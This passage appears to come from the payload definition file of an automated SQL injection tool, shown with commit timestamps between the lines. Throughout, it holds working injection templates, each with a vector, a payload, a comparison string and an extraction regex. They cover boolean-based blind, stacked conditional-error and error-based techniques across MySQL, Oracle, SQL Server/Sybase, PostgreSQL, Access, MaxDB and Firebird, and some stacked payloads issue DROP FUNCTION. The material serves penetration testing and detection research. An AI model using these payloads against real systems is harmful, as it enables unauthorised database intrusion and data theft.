<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2011-01-24 19:21:27 +03:00
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2011-01-25 01:28:54 +03:00
2011-02-21 23:04:50 +03:00
<test >
<title > Microsoft Access boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
<request >
<payload > IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
</request>
<response >
<comparison > IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
2011-02-21 23:59:34 +03:00
<test >
<title > SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request >
<payload > (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response >
<comparison > (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
2010-12-04 19:40:08 +03:00
<!-- End of boolean - based blind tests - Parameter replace -->
2010-11-28 21:10:54 +03:00
2010-12-04 19:40:08 +03:00
<!-- Boolean - based blind tests - GROUP BY and ORDER BY clauses -->
2010-11-28 21:10:54 +03:00
<test >
2010-12-04 19:40:08 +03:00
<title > Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
2010-11-28 21:10:54 +03:00
<stype > 1</stype>
2010-12-04 19:40:08 +03:00
<level > 3</level>
2010-11-28 21:10:54 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
2010-12-04 19:40:08 +03:00
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
2011-01-12 01:18:47 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
2011-01-12 01:18:47 +03:00
</request>
<response >
2011-03-08 17:29:22 +03:00
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
2011-01-12 01:18:47 +03:00
</response>
</test>
<test >
<title > Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2011-03-08 17:29:22 +03:00
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
2010-11-28 21:10:54 +03:00
</response>
</test>
<test >
2010-12-04 19:40:08 +03:00
<title > MySQL > = 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
2010-11-28 21:10:54 +03:00
<stype > 1</stype>
2010-12-04 19:40:08 +03:00
<level > 3</level>
2010-11-28 21:10:54 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
2010-12-04 19:40:08 +03:00
<where > 1</where>
2011-11-22 19:28:31 +04:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-11-22 19:28:31 +04:00
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2011-11-22 19:28:31 +04:00
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > MySQL</dbms>
2010-12-04 19:40:08 +03:00
<dbms_version > > = 5.0</dbms_version>
2010-11-28 21:10:54 +03:00
</details>
</test>
<test >
2010-12-04 19:40:08 +03:00
<title > MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
2010-11-28 21:10:54 +03:00
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
2010-12-04 19:40:08 +03:00
<clause > 2,3</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2011-03-08 17:29:22 +03:00
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
2010-11-28 21:10:54 +03:00
</response>
<details >
2010-12-04 19:40:08 +03:00
<dbms > MySQL</dbms>
2010-11-28 21:10:54 +03:00
</details>
</test>
<test >
2010-12-04 19:40:08 +03:00
<title > Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
2010-11-28 21:10:54 +03:00
<stype > 1</stype>
2010-12-04 19:40:08 +03:00
<level > 3</level>
2010-11-28 21:10:54 +03:00
<risk > 1</risk>
<clause > 3</clause>
2010-12-04 19:40:08 +03:00
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2011-03-08 17:29:22 +03:00
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
2010-11-28 21:10:54 +03:00
</response>
<details >
2010-12-04 19:40:08 +03:00
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-11-28 21:10:54 +03:00
</details>
</test>
<test >
2010-12-07 20:17:01 +03:00
<title > Oracle boolean-based blind - GROUP BY and ORDER BY clauses</title>
2010-11-28 21:10:54 +03:00
<stype > 1</stype>
2010-12-04 19:40:08 +03:00
<level > 3</level>
2010-11-28 21:10:54 +03:00
<risk > 1</risk>
2010-12-07 20:17:01 +03:00
<clause > 2,3</clause>
2010-12-04 19:40:08 +03:00
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2011-03-08 17:29:22 +03:00
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
2010-11-28 21:10:54 +03:00
</response>
2010-12-04 19:40:08 +03:00
<details >
<dbms > Oracle</dbms>
</details>
2010-11-28 21:10:54 +03:00
</test>
2011-02-21 23:04:50 +03:00
<test >
<title > Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
2011-02-21 23:04:50 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
2011-02-21 23:04:50 +03:00
</request>
<response >
2011-03-08 17:29:22 +03:00
<comparison > ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
2011-02-21 23:04:50 +03:00
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<!-- TODO: check against SAP MaxDB -->
2010-12-07 15:45:45 +03:00
<!-- End of boolean - based blind tests - GROUP BY and ORDER BY clauses -->
2010-11-28 21:10:54 +03:00
2011-01-24 20:04:49 +03:00
<!-- Stacked conditional - error blind queries tests -->
<test >
<title > MySQL stacked conditional-error blind queries</title>
<stype > 1</stype>
<level > 3</level>
<risk > 0</risk>
<clause > 0</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</vector>
2011-01-24 20:04:49 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</payload>
2011-11-24 02:57:02 +04:00
<comment > #</comment>
2011-01-24 20:04:49 +03:00
</request>
<response >
2011-03-08 17:29:22 +03:00
<comparison > ; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</comparison>
2011-01-24 20:04:49 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2012-04-04 14:11:48 +04:00
<title > Microsoft SQL Server/Sybase stacked conditional-error blind queries</title>
2011-01-24 20:04:49 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 0</risk>
<clause > 0</clause>
2012-04-04 14:11:48 +04:00
<where > 1</where>
<vector > ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</vector>
2011-01-24 20:04:49 +03:00
<request >
2012-04-04 14:11:48 +04:00
<payload > ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</payload>
2011-01-24 20:04:49 +03:00
<comment > --</comment>
</request>
<response >
2012-04-04 14:11:48 +04:00
<comparison > ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</comparison>
2011-01-24 20:04:49 +03:00
</response>
<details >
2012-04-04 14:11:48 +04:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
2011-01-24 20:04:49 +03:00
</details>
</test>
<test >
2012-04-04 14:11:48 +04:00
<title > PostgreSQL stacked conditional-error blind queries</title>
2011-01-24 20:04:49 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 0</risk>
<clause > 0</clause>
2012-04-04 14:11:48 +04:00
<where > 2</where>
<vector > ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</vector>
2011-01-24 20:04:49 +03:00
<request >
2012-04-04 14:11:48 +04:00
<payload > ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</payload>
2011-01-24 20:04:49 +03:00
<comment > --</comment>
</request>
<response >
2012-04-04 14:11:48 +04:00
<comparison > ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</comparison>
2011-01-24 20:04:49 +03:00
</response>
<details >
2012-04-04 14:11:48 +04:00
<dbms > PostgreSQL</dbms>
2011-01-24 20:04:49 +03:00
</details>
</test>
<!-- End of stacked conditional - error blind queries tests -->
2011-01-20 21:35:21 +03:00
<!-- Error - based tests - WHERE or HAVING clause -->
2010-11-28 21:10:54 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > MySQL > = 5.0 AND error-based - WHERE or HAVING clause</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
<level > 1</level>
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
2011-11-22 19:28:31 +04:00
<vector > AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-11-22 19:28:31 +04:00
<payload > AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
2011-07-10 12:54:22 +04:00
<test >
2011-07-25 01:08:32 +04:00
<title > MySQL > = 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
2011-07-10 12:54:22 +04:00
<stype > 2</stype>
<level > 2</level>
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
2011-07-25 01:08:32 +04:00
<vector > AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
2011-07-10 12:54:22 +04:00
<request >
2011-07-25 01:08:32 +04:00
<payload > AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
<stype > 2</stype>
<level > 3</level>
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request >
<payload > AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
2011-07-10 12:54:22 +04:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
2011-05-23 10:24:45 +04:00
<test >
<title > MySQL > = 4.1 AND error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 2</level>
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
2012-06-12 02:27:33 +04:00
<vector > AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
2011-05-23 10:24:45 +04:00
<request >
2012-06-12 02:27:33 +04:00
<payload > AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
2011-05-23 10:24:45 +04:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 4.1</dbms_version>
</details>
</test>
2010-11-28 21:10:54 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > PostgreSQL AND error-based - WHERE or HAVING clause</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
<level > 1</level>
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
2010-12-11 11:24:29 +03:00
<vector > AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
2010-11-28 21:10:54 +03:00
<request >
2010-12-01 13:31:50 +03:00
<payload > AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
2011-01-20 21:35:21 +03:00
<title > Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
<level > 1</level>
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
2010-12-11 11:24:29 +03:00
<vector > AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
2010-11-28 21:10:54 +03:00
<request >
2010-12-01 13:31:50 +03:00
<payload > AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-11-28 21:10:54 +03:00
</details>
</test>
2010-12-17 22:00:20 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
2010-12-17 22:00:20 +03:00
<stype > 2</stype>
<level > 2</level>
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request >
<payload > AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-12-17 22:00:20 +03:00
</details>
</test>
2010-11-28 21:10:54 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
<level > 1</level>
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
2012-03-01 15:59:37 +04:00
<vector > AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-21 16:13:12 +03:00
<payload > AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2010-12-02 18:09:21 +03:00
2010-12-06 23:43:23 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)</title>
2010-12-06 23:43:23 +03:00
<stype > 2</stype>
<level > 2</level>
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
2010-12-11 11:24:29 +03:00
<vector > AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2010-12-06 23:43:23 +03:00
<request >
2010-12-07 01:52:18 +03:00
<payload > AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
2010-12-06 23:43:23 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
2010-12-07 00:39:57 +03:00
<dbms_version > > = 8.1.6</dbms_version>
2010-12-06 23:43:23 +03:00
</details>
</test>
2010-12-07 00:20:26 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)</title>
2010-12-07 00:20:26 +03:00
<stype > 2</stype>
<level > 3</level>
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2010-12-07 00:20:26 +03:00
<request >
2010-12-07 01:52:18 +03:00
<payload > AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
2010-12-07 00:20:26 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2010-12-02 18:09:21 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > Firebird AND error-based - WHERE or HAVING clause</title>
2010-12-02 18:09:21 +03:00
<stype > 2</stype>
2010-12-04 19:40:08 +03:00
<level > 2</level>
2010-12-02 18:09:21 +03:00
<risk > 0</risk>
<clause > 1</clause>
<where > 1</where>
2010-12-11 11:24:29 +03:00
<vector > AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2010-12-02 18:09:21 +03:00
<request >
<payload > AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
2010-12-03 13:52:24 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > MySQL > = 5.0 OR error-based - WHERE or HAVING clause</title>
2010-12-03 13:52:24 +03:00
<stype > 2</stype>
<level > 2</level>
<risk > 2</risk>
<clause > 1</clause>
2010-12-05 15:23:18 +03:00
<where > 2</where>
2011-11-22 19:28:31 +04:00
<vector > OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
2010-12-03 13:52:24 +03:00
<request >
2011-11-22 19:28:31 +04:00
<payload > OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
2010-12-03 13:52:24 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
2011-07-10 12:54:22 +04:00
<test >
2011-07-25 01:08:32 +04:00
<title > MySQL > = 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
2011-07-10 12:54:22 +04:00
<stype > 2</stype>
<level > 3</level>
<risk > 2</risk>
<clause > 1</clause>
<where > 1</where>
2011-07-25 02:26:11 +04:00
<vector > OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
2011-07-25 01:08:32 +04:00
<request >
2011-07-25 02:26:11 +04:00
<payload > OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
2011-07-25 01:08:32 +04:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 1</clause>
<where > 1</where>
<vector > OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
2011-07-10 12:54:22 +04:00
<request >
2011-07-25 01:08:32 +04:00
<payload > OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
2011-07-10 12:54:22 +04:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
2010-12-09 18:09:03 +03:00
<test >
2011-05-23 10:24:45 +04:00
<title > MySQL > = 4.1 OR error-based - WHERE or HAVING clause</title>
2010-12-09 18:09:03 +03:00
<stype > 2</stype>
<level > 2</level>
2011-07-10 12:54:22 +04:00
<risk > 2</risk>
2010-12-09 18:09:03 +03:00
<clause > 1</clause>
<where > 2</where>
2012-06-12 02:27:33 +04:00
<vector > OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
2011-05-23 10:24:45 +04:00
<request >
2012-06-12 02:27:33 +04:00
<payload > OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
2011-05-23 10:24:45 +04:00
</request>
<response >
